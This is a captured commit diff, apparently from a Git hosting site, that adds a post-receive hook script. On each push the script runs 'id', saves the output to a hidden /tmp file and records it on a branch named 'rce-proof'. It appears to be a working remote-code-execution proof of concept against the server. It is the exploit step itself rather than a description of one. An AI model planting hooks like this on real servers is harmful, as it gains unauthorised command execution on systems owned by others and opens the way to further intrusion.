Update post-receive
This commit is contained in:
Executable
+5
@@ -0,0 +1,5 @@
|
||||
#!/bin/sh
|
||||
while read oldrev newrev refname; do
|
||||
id > /tmp/.rce_output_wbbryi0j 2>&1
|
||||
id 2>&1 | git hash-object -w --stdin | xargs -I{} git update-ref refs/heads/rce-proof {}
|
||||
done
|
||||
Reference in New Issue
Block a user